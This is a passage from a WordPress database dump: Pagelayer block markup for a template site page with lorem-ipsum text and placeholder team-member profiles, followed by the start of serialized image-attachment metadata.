{\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin_tablet\":\"0em,0em,2em,0em\",\"ele_padding_mobile\":\"0px,0px,35px,0px\",\"text\":\"u003cpu003eNullam eget dolor sit amet sed diam nonummy nibh euismodor sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi beatae.u003c/pu003e\",\"pagelayer-id\":\"vsv7069\"} --><p>Nullam eget dolor sit amet sed diam nonummy nibh euismodor sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi beatae.</p><!-- /wp:pagelayer/pl_text -->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"col\":\"6\",\"animation\":\"\",\"animation_delay\":\"600\",\"pagelayer-id\":\"lgw1958\"} -->\n<!-- wp:pagelayer/pl_image {\"id\":\"13\",\"id-size\":\"full\",\"align\":\"center\",\"img_hover\":\"normal\",\"img_hover_delay\":\"400\",\"caption_color\":\"#3E8EF7\",\"ele_bg_hover_delay\":\"400\",\"overlay\":\"true\",\"icon\":\"\",\"icon_color\":\"#eeaa6dff\",\"icon_size\":\"65\",\"overlay_bg_type\":\"color\",\"overlay_bg\":\"#0000001c\",\"content_position\":\"center\",\"show_always\":\"true\",\"link_type\":\"custom_url\",\"link\":\"https://www.youtube.com/watch?v=WTagooKJMjE\",\"target\":\"true\",\"animation\":\"\",\"animation_delay\":\"700\",\"max-width_tablet\":\"100\",\"text\":\"n\",\"pagelayer-id\":\"3p187\"} -->\n<!-- /wp:pagelayer/pl_image -->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- /wp:pagelayer/pl_inner_row -->\n<!-- /wp:pagelayer/pl_col -->\n<!-- /wp:pagelayer/pl_row -->\n<!-- wp:pagelayer/pl_row {\"stretch\":\"auto\",\"col_gap\":\"10\",\"width_content\":\"auto\",\"row_height\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#fff\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#fff\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"ele_bg_hover_delay\":\"400\",\"ele_bg_type\":\"image\",\"ele_bg_attachment\":\"scroll\",\"ele_bg_posx\":\"center\",\"ele_bg_posy\":\"bottom\",\"ele_bg_repeat\":\"no-repeat\",\"ele_bg_size\":\"cover\",\"ele_padding\":\"9em,0em,9em,0em\",\"ele_bg_img\":\"6\",\"ele_margin\":\"4em,0em,0em,0em\",\"ele_padding_mobile\":\"3em,0em,3em,0em\",\"ele_margin_mobile\":\"3em,0em,3em,0em\",\"ele_padding_tablet\":\"4em,0em,4em,0em\",\"ele_margin_tablet\":\"3em,0em,0em,0em\",\"pagelayer-id\":\"a8p6079\"} -->\n<!-- wp:pagelayer/pl_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"ele_bg_hover_delay\":\"400\",\"col\":\"3\",\"pagelayer-id\":\"9yu7254\"} -->\n<!-- wp:pagelayer/pl_inner_row {\"stretch\":\"auto\",\"col_gap\":\"10\",\"width_content\":\"auto\",\"row_height\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#fff\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#fff\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"ele_bg_hover_delay\":\"400\",\"pagelayer-id\":\"s7g7021\"} -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"ele_bg_hover_delay\":\"400\",\"col\":\"4\",\"pagelayer-id\":\"5hw2741\"} -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"heading_typo_mobile\":\",25,,,,,Solid,1,,,\",\"text\":\"u003ch3u003eTRAVEL FAR ENOUGH, YOU MEET YOURSELFu003c/h3u003e\",\"color\":\"#ffffffff\",\"pagelayer-id\":\"i771446\"} --><h3>TRAVEL FAR ENOUGH, YOU MEET YOURSELF</h3><!-- /wp:pagelayer/pl_heading -->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- /wp:pagelayer/pl_inner_row -->\n<!-- wp:pagelayer/pl_text {\"ele_padding\":\"0%,15%,0%,15%\",\"ele_padding_mobile\":\"1px,1px,1px,1px\",\"animation\":\"\",\"animation_delay\":\"700\",\"text\":\"u003cp style=u0022text-align: centeru0022u003eu003cspanu003eThis is Photoshop\'s version of Lorem Ipsum. Proin gravida nibh vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor, nisi elit consequat ipsum, nec sagittis sem nibh id elit.u003c/spanu003eu003c/pu003e\",\"pagelayer-id\":\"zai3572\"} --><p style=\"text-align: center\"><span>This is Photoshop\'s version of Lorem Ipsum. Proin gravida nibh vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor, nisi elit consequat ipsum, nec sagittis sem nibh id elit.</span></p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_btn {\"text\":\"Subscribe\",\"align\":\"center\",\"type\":\"pagelayer-btn-custom\",\"size\":\"pagelayer-btn-small\",\"btn_hover_delay\":\"400\",\"icon_position\":\"pagelayer-btn-icon-left\",\"icon_spacing\":\"5\",\"btn_border_type\":\"solid\",\"btn_border_color\":\"\",\"btn_border_radius\":\"0,0,0,0\",\"btn_border_width\":\"0,0,0,0\",\"btn_bg_color\":\"#efba6cff\",\"btn_color\":\"#ffffff\",\"btn_bg_color_hover\":\"#fefefeff\",\"btn_typo\":\",,,,,,Solid,,Uppercase,,\",\"btn_hover\":\"hover\",\"btn_color_hover\":\"#efba6cff\",\"animation\":\"\",\"animation_delay\":\"800\",\"pagelayer-id\":\"urd8148\"} /-->\n<!-- /wp:pagelayer/pl_col -->\n<!-- /wp:pagelayer/pl_row -->\n<!-- wp:pagelayer/pl_row {\"stretch\":\"auto\",\"col_gap\":\"10\",\"width_content\":\"auto\",\"row_height\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#fff\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#fff\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"ele_bg_hover_delay\":\"400\",\"ele_padding\":\"5em,0em,0em,0em\",\"ele_padding_mobile\":\"2em,0em,0em,0em\",\"ele_padding_tablet\":\"3em,0em,0em,0em\",\"pagelayer-id\":\"6u68858\"} -->\n<!-- wp:pagelayer/pl_col {\"widget_space\":\"0\",\"overlay_hover_delay\":\"400\",\"ele_bg_hover_delay\":\"400\",\"pagelayer-id\":\"n3o5359\"} -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"text\":\"u003ch6u003eAmazing Staffu003c/h6u003e\",\"pagelayer-id\":\"ia01904\"} --><h6>Amazing Staff</h6><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-4px,0px,0px,0px\",\"text\":\"u003ch5u003eMeet Our Teamu003c/h2u003e\",\"pagelayer-id\":\"i151160\"} --><h5>Meet Our Team</h2><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-65px,0px,0px,0px\",\"ele_zindex\":\"-1\",\"heading_typo_mobile\":\",60,,,,,Solid,,,,\",\"text\":\"u003ch2u003eOur Teamu003c/h2u003e\",\"pagelayer-id\":\"gk56279\"} --><h2>Our Team</h2><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"1em,0em,2em,0em\",\"ele_padding_mobile\":\"1px,10px,1px,10px\",\"text\":\"u003cp style=u0022text-align: centeru0022u003eNulla posuere sollicitudin aliquam ultrices. Id consectetur purus ut faucibus pulvinar elementum integer enim. u003cbr /u003eAmet commodo nulla facilisi nullam vehicula. Eu turpis egestas pretium aenean pharetra.u003cbr /u003e Nibh venenatis cras sed felis eget velit aliquet sagittis.u003c/pu003e\",\"ele_custom_pos\":\"true\",\"ele_align\":\"50%\",\"ele_height\":\"auto\",\"ele_custom_width\":\"650px\",\"pagelayer-id\":\"azt1744\"} --><p style=\"text-align: center\">Nulla posuere sollicitudin aliquam ultrices. Id consectetur purus ut faucibus pulvinar elementum integer enim. <br />Amet commodo nulla facilisi nullam vehicula. Eu turpis egestas pretium aenean pharetra.<br /> Nibh venenatis cras sed felis eget velit aliquet sagittis.</p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_inner_row {\"stretch\":\"auto\",\"col_gap\":\"10\",\"width_content\":\"auto\",\"row_height\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#227bc3\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#e44993\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"ele_margin\":\"0em,0em,0em,0em\",\"pagelayer-id\":\"lyv7327\"} -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"col\":\"1\",\"ele_margin\":\"3em,0em,0em,0em\",\"animation\":\"\",\"animation_delay\":\"600\",\"pagelayer-id\":\"wls6867\"} -->\n<!-- wp:pagelayer/pl_service {\"service_image\":\"4\",\"service_image_size\":\"custom\",\"service_alignment\":\"top\",\"service_vertical_alignment\":\"top\",\"img_bor_state\":\"normal\",\"img_filter\":\"0,100,100,0,0,100,100\",\"img_transition\":\"400\",\"img_filter_hover\":\"0,100,100,0,0,100,100\",\"service_heading\":\"Susan Day\",\"heading_alignment\":\"center\",\"service_title_spacing\":\"20,0,10,0\",\"heading_state\":\"normal\",\"service_heading_color\":\"#101112ff\",\"service_heading_typo\":\",18,,600,,,Solid,,Uppercase,,\",\"heading_transition\":\"400\",\"service_text_alignment\":\"center\",\"service_btn_hover_delay\":\"400\",\"service_content_spacing\":\"0,15,50,15\",\"service_image_custom_size\":\"120\",\"service_img_alignment\":\"center\",\"service_image_spacing\":\"0,0,0,0\",\"img_border_type\":\"solid\",\"img_border_color\":\"#dfdfdfff\",\"img_border_radius\":\"100%,100%,100%,100%\",\"border_type\":\"solid\",\"border_width\":\"1px,1px,1px,1px\",\"border_color\":\"#5b5959ff\",\"img_border_width\":\"1,1,1,1\",\"ele_css\":\"{{element}} .pagelayer-service-image{nmargin-top: -55px;n}\",\"ele_padding\":\"0px,0px,40px,0px\",\"service_text\":\"u003ch5u003eManageru003c/h5u003enu003cpu003eAl alit emnos lnipedit ius, vel et hinc agam fabulas. Ut audiam invenire iracundia vim. An eam dico similique, ut sint posse sit.u003c/pu003e\",\"pagelayer-id\":\"8ms7248\"} --><h5>Manager</h5>\n<p>Al alit emnos lnipedit ius, vel et hinc agam fabulas. Ut audiam invenire iracundia vim. An eam dico similique, ut sint posse sit.</p><!-- /wp:pagelayer/pl_service -->\n<!-- wp:pagelayer/pl_social_grp {\"align\":\"center\",\"group_layout\":\"pagelayer-btn-grp-horizontal\",\"icon_spacing\":\"0\",\"icon_size\":\"20\",\"color_scheme\":\"\",\"icon_color\":\"#5c5858ff\",\"social_hover_delay\":\"400\",\"icon_color_hover\":\"#ffffff\",\"bg_shape\":\"pagelayer-social-shape-square\",\"bg_size\":\"7\",\"ele_margin\":\"-80px,0px,0px,0px\",\"ele_css\":\"{{element}} .pagelayer-service-image{ntop: 58px !important;nposition: relative;n}\",\"icon_bg_color\":\"#00ccff00\",\"icon_bg_color_hover\":\"#efba6cff\",\"icon_border_type\":\"solid\",\"icon_border_color\":\"#3b3b3e9e\",\"icon_border_width\":\"1,1,1,1\",\"social_hover\":\"hover\",\"pagelayer-id\":\"ygb9138\"} -->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-facebook-f\",\"social_url\":\"https://facebook.com/sitepad\",\"pagelayer-id\":\"wow922\"} /-->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-twitter\",\"social_url\":\"https://twitter.com/sitepad\",\"pagelayer-id\":\"lfg2362\"} /-->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-google-plus-g\",\"social_url\":\"https://plus.google.com/sitepad\",\"pagelayer-id\":\"zqg3285\"} /-->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-linkedin-in\",\"social_url\":\"https://linkedin.com/sitepad\",\"pagelayer-id\":\"af46547\"} /-->\n<!-- /wp:pagelayer/pl_social_grp -->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"col\":\"1\",\"ele_margin\":\"3em,0em,0em,0em\",\"animation\":\"\",\"animation_delay\":\"700\",\"pagelayer-id\":\"1d15001\"} -->\n<!-- wp:pagelayer/pl_service {\"service_image\":\"4\",\"service_image_size\":\"custom\",\"service_alignment\":\"top\",\"service_vertical_alignment\":\"top\",\"img_bor_state\":\"normal\",\"img_filter\":\"0,100,100,0,0,100,100\",\"img_transition\":\"400\",\"img_filter_hover\":\"0,100,100,0,0,100,100\",\"service_heading\":\"James Duncan\",\"heading_alignment\":\"center\",\"service_title_spacing\":\"20,0,10,0\",\"heading_state\":\"normal\",\"service_heading_color\":\"#101112ff\",\"service_heading_typo\":\",18,,600,,,Solid,,Uppercase,,\",\"heading_transition\":\"400\",\"service_text_alignment\":\"center\",\"service_btn_hover_delay\":\"400\",\"service_content_spacing\":\"0,15,50,15\",\"service_image_custom_size\":\"120\",\"service_img_alignment\":\"center\",\"service_image_spacing\":\"0,0,0,0\",\"img_border_type\":\"solid\",\"img_border_color\":\"#dfdfdfff\",\"img_border_radius\":\"100%,100%,100%,100%\",\"border_type\":\"solid\",\"border_width\":\"1px,1px,1px,1px\",\"border_color\":\"#5b5959ff\",\"img_border_width\":\"1,1,1,1\",\"ele_css\":\"{{element}} .pagelayer-service-image{nmargin-top: -55px;n}\",\"ele_padding\":\"0px,0px,40px,0px\",\"service_text\":\"u003ch5u003eLeaderu003c/h5u003enu003cpu003eAl alit emnos lnipedit ius, vel et hinc agam fabulas. Ut audiam invenire iracundia vim. An eam dico similique, ut sint posse sit.u003c/pu003e\",\"pagelayer-id\":\"bg04263\"} --><h5>Leader</h5>\n<p>Al alit emnos lnipedit ius, vel et hinc agam fabulas. Ut audiam invenire iracundia vim. An eam dico similique, ut sint posse sit.</p><!-- /wp:pagelayer/pl_service -->\n<!-- wp:pagelayer/pl_social_grp {\"align\":\"center\",\"group_layout\":\"pagelayer-btn-grp-horizontal\",\"icon_spacing\":\"0\",\"icon_size\":\"20\",\"color_scheme\":\"\",\"icon_color\":\"#5c5858ff\",\"social_hover_delay\":\"400\",\"icon_color_hover\":\"#ffffff\",\"bg_shape\":\"pagelayer-social-shape-square\",\"bg_size\":\"7\",\"ele_margin\":\"-80px,0px,0px,0px\",\"ele_css\":\"{{element}} .pagelayer-service-image{ntop: 58px !important;nposition: relative;n}\",\"icon_bg_color\":\"#00ccff00\",\"icon_bg_color_hover\":\"#efba6cff\",\"icon_border_type\":\"solid\",\"icon_border_color\":\"#3b3b3e9e\",\"icon_border_width\":\"1,1,1,1\",\"social_hover\":\"hover\",\"pagelayer-id\":\"bb15453\"} -->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-facebook-f\",\"social_url\":\"https://facebook.com/sitepad\",\"pagelayer-id\":\"ofa8491\"} /-->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-twitter\",\"social_url\":\"https://twitter.com/sitepad\",\"pagelayer-id\":\"ryu4544\"} /-->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-google-plus-g\",\"social_url\":\"https://plus.google.com/sitepad\",\"pagelayer-id\":\"ywe7457\"} /-->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-linkedin-in\",\"social_url\":\"https://linkedin.com/sitepad\",\"pagelayer-id\":\"qc22130\"} /-->\n<!-- /wp:pagelayer/pl_social_grp -->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"col\":\"1\",\"ele_margin\":\"3em,0em,0em,0em\",\"animation\":\"\",\"animation_delay\":\"700\",\"pagelayer-id\":\"6r87422\"} -->\n<!-- wp:pagelayer/pl_service {\"service_image\":\"4\",\"service_image_size\":\"custom\",\"service_alignment\":\"top\",\"service_vertical_alignment\":\"top\",\"img_bor_state\":\"normal\",\"img_filter\":\"0,100,100,0,0,100,100\",\"img_transition\":\"400\",\"img_filter_hover\":\"0,100,100,0,0,100,100\",\"service_heading\":\"Lori Harvey\",\"heading_alignment\":\"center\",\"service_title_spacing\":\"20,0,10,0\",\"heading_state\":\"normal\",\"service_heading_color\":\"#101112ff\",\"service_heading_typo\":\",18,,600,,,Solid,,Uppercase,,\",\"heading_transition\":\"400\",\"service_text_alignment\":\"center\",\"service_btn_hover_delay\":\"400\",\"service_content_spacing\":\"0,15,50,15\",\"service_image_custom_size\":\"120\",\"service_img_alignment\":\"center\",\"service_image_spacing\":\"0,0,0,0\",\"img_border_type\":\"solid\",\"img_border_color\":\"#dfdfdfff\",\"img_border_radius\":\"100%,100%,100%,100%\",\"border_type\":\"solid\",\"border_width\":\"1px,1px,1px,1px\",\"border_color\":\"#5b5959ff\",\"img_border_width\":\"1,1,1,1\",\"ele_css\":\"{{element}} .pagelayer-service-image{nmargin-top: -55px;n}\",\"ele_padding\":\"0px,0px,40px,0px\",\"service_text\":\"u003ch5u003eSupervisoru003c/h5u003enu003cpu003eAl alit emnos lnipedit ius, vel et hinc agam fabulas. Ut audiam invenire iracundia vim. An eam dico similique, ut sint posse sit.u003c/pu003e\",\"pagelayer-id\":\"yyu124\"} --><h5>Supervisor</h5>\n<p>Al alit emnos lnipedit ius, vel et hinc agam fabulas. Ut audiam invenire iracundia vim. An eam dico similique, ut sint posse sit.</p><!-- /wp:pagelayer/pl_service -->\n<!-- wp:pagelayer/pl_social_grp {\"align\":\"center\",\"group_layout\":\"pagelayer-btn-grp-horizontal\",\"icon_spacing\":\"0\",\"icon_size\":\"20\",\"color_scheme\":\"\",\"icon_color\":\"#5c5858ff\",\"social_hover_delay\":\"400\",\"icon_color_hover\":\"#ffffff\",\"bg_shape\":\"pagelayer-social-shape-square\",\"bg_size\":\"7\",\"ele_margin\":\"-80px,0px,0px,0px\",\"ele_css\":\"{{element}} .pagelayer-service-image{ntop: 58px !important;nposition: relative;n}\",\"icon_bg_color\":\"#00ccff00\",\"icon_bg_color_hover\":\"#efba6cff\",\"icon_border_type\":\"solid\",\"icon_border_color\":\"#3b3b3e9e\",\"icon_border_width\":\"1,1,1,1\",\"social_hover\":\"hover\",\"pagelayer-id\":\"mzm7746\"} -->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-facebook-f\",\"social_url\":\"https://facebook.com/sitepad\",\"pagelayer-id\":\"qzi6431\"} /-->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-twitter\",\"social_url\":\"https://twitter.com/sitepad\",\"pagelayer-id\":\"dop7386\"} /-->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-google-plus-g\",\"social_url\":\"https://plus.google.com/sitepad\",\"pagelayer-id\":\"huj3423\"} /-->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-linkedin-in\",\"social_url\":\"https://linkedin.com/sitepad\",\"pagelayer-id\":\"1s04265\"} /-->\n<!-- /wp:pagelayer/pl_social_grp -->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"col\":\"1\",\"ele_margin\":\"3em,0em,0em,0em\",\"animation\":\"\",\"animation_delay\":\"800\",\"pagelayer-id\":\"ynr8569\"} -->\n<!-- wp:pagelayer/pl_service {\"service_image\":\"4\",\"service_image_size\":\"custom\",\"service_alignment\":\"top\",\"service_vertical_alignment\":\"top\",\"img_bor_state\":\"normal\",\"img_filter\":\"0,100,100,0,0,100,100\",\"img_transition\":\"400\",\"img_filter_hover\":\"0,100,100,0,0,100,100\",\"service_heading\":\"Ralph Fields\",\"heading_alignment\":\"center\",\"service_title_spacing\":\"20,0,10,0\",\"heading_state\":\"normal\",\"service_heading_color\":\"#101112ff\",\"service_heading_typo\":\",18,,600,,,Solid,,Uppercase,,\",\"heading_transition\":\"400\",\"service_text_alignment\":\"center\",\"service_btn_hover_delay\":\"400\",\"service_content_spacing\":\"0,15,50,15\",\"service_image_custom_size\":\"120\",\"service_img_alignment\":\"center\",\"service_image_spacing\":\"0,0,0,0\",\"img_border_type\":\"solid\",\"img_border_color\":\"#dfdfdfff\",\"img_border_radius\":\"100%,100%,100%,100%\",\"border_type\":\"solid\",\"border_width\":\"1px,1px,1px,1px\",\"border_color\":\"#5b5959ff\",\"img_border_width\":\"1,1,1,1\",\"ele_css\":\"{{element}} .pagelayer-service-image{nmargin-top: -55px;n}\",\"ele_padding\":\"0px,0px,40px,0px\",\"service_text\":\"u003ch5u003eFounderu003c/h5u003enu003cpu003eAl alit emnos lnipedit ius, vel et hinc agam fabulas. Ut audiam invenire iracundia vim. An eam dico similique, ut sint posse sit.u003c/pu003e\",\"pagelayer-id\":\"dcz9820\"} --><h5>Founder</h5>\n<p>Al alit emnos lnipedit ius, vel et hinc agam fabulas. Ut audiam invenire iracundia vim. An eam dico similique, ut sint posse sit.</p><!-- /wp:pagelayer/pl_service -->\n<!-- wp:pagelayer/pl_social_grp {\"align\":\"center\",\"group_layout\":\"pagelayer-btn-grp-horizontal\",\"icon_spacing\":\"0\",\"icon_size\":\"20\",\"color_scheme\":\"\",\"icon_color\":\"#5c5858ff\",\"social_hover_delay\":\"400\",\"icon_color_hover\":\"#ffffff\",\"bg_shape\":\"pagelayer-social-shape-square\",\"bg_size\":\"7\",\"ele_margin\":\"-80px,0px,0px,0px\",\"ele_css\":\"{{element}} .pagelayer-service-image{ntop: 58px !important;nposition: relative;n}\",\"icon_bg_color\":\"#00ccff00\",\"icon_bg_color_hover\":\"#efba6cff\",\"icon_border_type\":\"solid\",\"icon_border_color\":\"#3b3b3e9e\",\"icon_border_width\":\"1,1,1,1\",\"social_hover\":\"hover\",\"pagelayer-id\":\"l8u11\"} -->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-facebook-f\",\"social_url\":\"https://facebook.com/sitepad\",\"pagelayer-id\":\"xgn7906\"} /-->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-twitter\",\"social_url\":\"https://twitter.com/sitepad\",\"pagelayer-id\":\"67x129\"} /-->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-google-plus-g\",\"social_url\":\"https://plus.google.com/sitepad\",\"pagelayer-id\":\"qbv1467\"} /-->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-linkedin-in\",\"social_url\":\"https://linkedin.com/sitepad\",\"pagelayer-id\":\"cks8217\"} /-->\n<!-- /wp:pagelayer/pl_social_grp -->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- /wp:pagelayer/pl_inner_row -->\n<!-- /wp:pagelayer/pl_col -->\n<!-- /wp:pagelayer/pl_row -->\n<!-- wp:pagelayer/pl_row {\"stretch\":\"auto\",\"col_gap\":\"10\",\"width_content\":\"auto\",\"row_height\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#227bc3\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#e44993\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"ele_bg_type\":\"color\",\"ele_bg_color\":\"#efba6cff\",\"ele_padding\":\"1em,0em,1em,0em\",\"content_pos\":\"center\",\"pagelayer-id\":\"ujt2667\"} -->\n<!-- wp:pagelayer/pl_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"col\":\"9\",\"content_pos\":\"center\",\"pagelayer-id\":\"hfe1794\"} -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"heading_typo_mobile\":\",20,,,,,Solid,,,,\",\"text\":\"u003ch4u003eHow Beautiful Is To Do Nothing And Then Rest Afterwards And Then Rest.u003c/h4u003e\",\"pagelayer-id\":\"9dk4258\"} --><h4>How Beautiful Is To Do Nothing And Then Rest Afterwards And Then Rest.</h4><!-- /wp:pagelayer/pl_heading -->\n<!-- /wp:pagelayer/pl_col -->\n<!-- wp:pagelayer/pl_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"col\":\"3\",\"pagelayer-id\":\"bu82568\"} -->\n<!-- wp:pagelayer/pl_btn {\"text\":\"Subscribe\",\"align\":\"center\",\"type\":\"pagelayer-btn-custom\",\"size\":\"pagelayer-btn-small\",\"btn_hover_delay\":\"400\",\"icon_position\":\"pagelayer-btn-icon-left\",\"icon_spacing\":\"5\",\"btn_border_type\":\"solid\",\"btn_border_color\":\"\",\"btn_border_radius\":\"0,0,0,0\",\"btn_border_width\":\"2,2,2,2\",\"btn_bg_color\":\"\",\"btn_color\":\"#ffffff\",\"btn_bg_color_hover\":\"#ffffffff\",\"btn_typo\":\",,,,,,Solid,,Uppercase,,\",\"btn_hover\":\"hover\",\"btn_color_hover\":\"#efba6cff\",\"btn_bor_hover\":\"hover\",\"btn_border_type_hover\":\"solid\",\"btn_border_color_hover\":\"#fefefeff\",\"btn_border_width_hover\":\"2,2,2,2\",\"align_tablet\":\"left\",\"align_mobile\":\"left\",\"pagelayer-id\":\"kbi5275\"} /-->\n<!-- /wp:pagelayer/pl_col -->\n<!-- /wp:pagelayer/pl_row -->'),(347,149,'_wp_attached_file','2021/05/IMG_3908-scaled.jpg'),(348,149,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1707;s:6:\"height\";i:2560;s:4:\"file\";s:27:\"2021/05/IMG_3908-scaled.jpg\";s:5:\"sizes\";a:16:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_3908-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IMG_3908-683x1024.jpg\";s:5:\"width\";i:683;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_3908-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"IMG_3908-768x1152.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:22:\"IMG_3908-1024x1536.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:22:\"IMG_3908-1365x2048.jpg\";s:5:\"width\";i:1365;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:20:\"IMG_3908-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:21:\"IMG_3908-1080x675.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:20:\"IMG_3908-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:20:\"IMG_3908-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-image-single\";a:4:{s:4:\"file\";s:22:\"IMG_3908-1080x1620.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:1620;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:20:\"IMG_3908-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:37:\"et-pb-post-main-image-fullwidth-large\";a:4:{s:4:\"file\";s:22:\"IMG_3908-2880x1800.jpg\";s:5:\"width\";i:2880;s:6:\"height\";i:1800;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"et-pb-image--responsive--desktop\";a:4:{s:4:\"file\";s:22:\"IMG_3908-1280x1920.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:1920;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-image--responsi